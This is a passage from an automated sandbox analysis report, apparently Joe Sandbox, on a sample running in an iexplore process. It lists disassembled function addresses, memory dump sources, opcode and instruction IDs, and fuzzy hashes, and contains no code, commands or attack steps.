                                  • Instruction Fuzzy Hash: F3E0CD35344614B7DB229A45CC00F797B15DF41790F108035FE089E650C5759C51D6D4
                                  Function 036A823B Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction ID: 29fd2d3f129c00e73b4b30317111b3237f3a9dc4c466bec6e5770452e3b92d78
                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction Fuzzy Hash: 8DE08C39140E10EEDB31EE19DC10B617AA5FB84B10F2448ADE1811A0A48674AC82CE8C
                                  Function 00416CC5 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40b8868a50c63986445b8aeb2393a539a5c106f6d4cdb1315be3e58ebcd20909
                                  • Instruction ID: 2427b86d78fec5f31eded7a99f6c282b85e3e06985426848838e7567cd5f0f13
                                  • Opcode Fuzzy Hash: 40b8868a50c63986445b8aeb2393a539a5c106f6d4cdb1315be3e58ebcd20909
                                  • Instruction Fuzzy Hash: F5D05E23EAA2164FC641CA09AC6A024F728EAC722971253DAD81867042D562C80282D5
                                  Function 037392BC Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 93bad7eb714b356d65201dc26b06fe74cd7c617ede6a74b6c576a50a3eda92be
                                  • Instruction ID: 7575d31289355898e9f7c0052951805c11600414c9a83cbee7f507bdcbf0bc63
                                  • Opcode Fuzzy Hash: 93bad7eb714b356d65201dc26b06fe74cd7c617ede6a74b6c576a50a3eda92be
                                  • Instruction Fuzzy Hash: 73F0E575251F80CFE71ADF08C1E1B5177B9FB8AB40F504458D4478BBA2C73AA942CE41
                                  Function 036B2050 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4d9ae876c21cef4ed17250c3a3ecd827e868d6a436d65876c71b66fe857fa1e
                                  • Instruction ID: 9985ae28885cda61f928963a851faab7bb8233bbfcae500d244ae9737195caea
                                  • Opcode Fuzzy Hash: f4d9ae876c21cef4ed17250c3a3ecd827e868d6a436d65876c71b66fe857fa1e
                                  • Instruction Fuzzy Hash: FEE0C2322006906BC312FB5DDD10F9A73AEEF95260F144229F1518B2D0CA24BC40CB98
                                  Function 0040E46A Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3f705fbb82d07fa48833a7eb43e8c921b409ff2f39c058f999a8f0743e15b9e
                                  • Instruction ID: e21392a19c9e6691cc7ab29d5a99b0027e9fe4c5cf08ef406dbf477388d98db4
                                  • Opcode Fuzzy Hash: a3f705fbb82d07fa48833a7eb43e8c921b409ff2f39c058f999a8f0743e15b9e
                                  • Instruction Fuzzy Hash: 83B09213B4580D14D3241CDD7A810F8E725D18B0A6EA036AACF08E36228402C05A10CA
                                  Function 036AA0E3 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: af268682a1ce939194d1b5f855724d8498a2378be1ed67a480ba9e9d962113b0
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 4FD01236326470A7CB29D699A914FABA915DF81A94F1A006E740A97A00C5198C43DAE4
                                  Function 036C02A0 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: b4c69b92d1f577fcbb5492800bb3171a1c3b305977d39a78de55c0a0f88b61cf
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 87D0C935226EC0CFC71ACF0DC6A4B2573B8FB44B44F8504D4E402CBB21E62CD940CA04
                                  Function 0373930B Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                  • Instruction ID: e9466ec69b9b21639a4442ccb36cd1c15970e9e5295478fac0fbdc25de89039d
                                  • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                  • Instruction Fuzzy Hash: 63D05E75941AC8CFE727CB08C1A5B907BF8F70AB40F890098E04247BA3C3BC9984CB01
                                  Function 036EC700 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 91a5d46c72568303a6407729d2f07592ec3eb96d9170129f7af95020e9eb810e
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: 58C08037250744AFC711DF94CD01F5577A9E798B40F104025F3044B670C535FC10D644
                                  Function 036D0310 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: 2b0a6e2d1bee6ca9c21d9223d3f0a06051e40dfc53b99bcc0d4811ca4aa89652
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: E2D01236100248EFCB01DF41C890D9A772AFBC8710F108019FD190B6108A31ED62DA50
                                  Function 036B0750 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: 1cf43095414016b4e35377f19cb69757de47af5e2745484efbaf535e7db6fe9d
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: 0EC00279611A418BCF15DA19D294A5577E4F744740F154894E8058BB21E625E801CA10
                                  Function 036F4340 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 40d049a849abc8974e31eb869551725c1560b74d4f798bab3b6911aebffb1f10
                                  • Instruction ID: 5c35ab2d662babd63effa3fdf4a209ac46d1db0d9f4e44e245a6af6adc6f574d
                                  • Opcode Fuzzy Hash: 40d049a849abc8974e31eb869551725c1560b74d4f798bab3b6911aebffb1f10
                                  • Instruction Fuzzy Hash: E0900271605C04A2A140B15848C4546404597E0301B55C021E04255A8C8B148A565362
                                  Function 036F3010 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5a577c586962fa634a0f8313f2f8a8d12b5b44fcd486eb09722e443607357da
                                  • Instruction ID: 279f3b70bd2d8eb38ca9085f3eb7505c377817c403aca2465cddf089b4f8fca9
                                  • Opcode Fuzzy Hash: f5a577c586962fa634a0f8313f2f8a8d12b5b44fcd486eb09722e443607357da
                                  • Instruction Fuzzy Hash: 18900261201C48D2E140B2584844B0F414587E1202F95C029A41575A8CCA1589555722
                                  Function 036F3090 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9b204f8152828814bd7f91827c63b0b97abeef89b9c6ffe1fb4272908f2cb9e
                                  • Instruction ID: 66db39c250f0e304fbab4fe315cb84d1aa39376402cd44a914b306f2ea00671d
                                  • Opcode Fuzzy Hash: f9b204f8152828814bd7f91827c63b0b97abeef89b9c6ffe1fb4272908f2cb9e
                                  • Instruction Fuzzy Hash: 6590026124180C92E140B15884547070046C7D0601F55C021A00255A8D87168A6566B2
                                  Function 036B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 177f57756b40837be1815247275ca22e9cd26f4eaeb03336550ac42205c6d1a6
                                  • Instruction ID: feacc49b547413dd789cc97d2425765defd2429dc071f76e52531207e02f0e2e
                                  • Opcode Fuzzy Hash: 177f57756b40837be1815247275ca22e9cd26f4eaeb03336550ac42205c6d1a6
                                  • Instruction Fuzzy Hash: 1C813A76D00269DBDB21DB54CC44BEEB7B8AF48710F0445EAEA19B7680D7309E80DFA4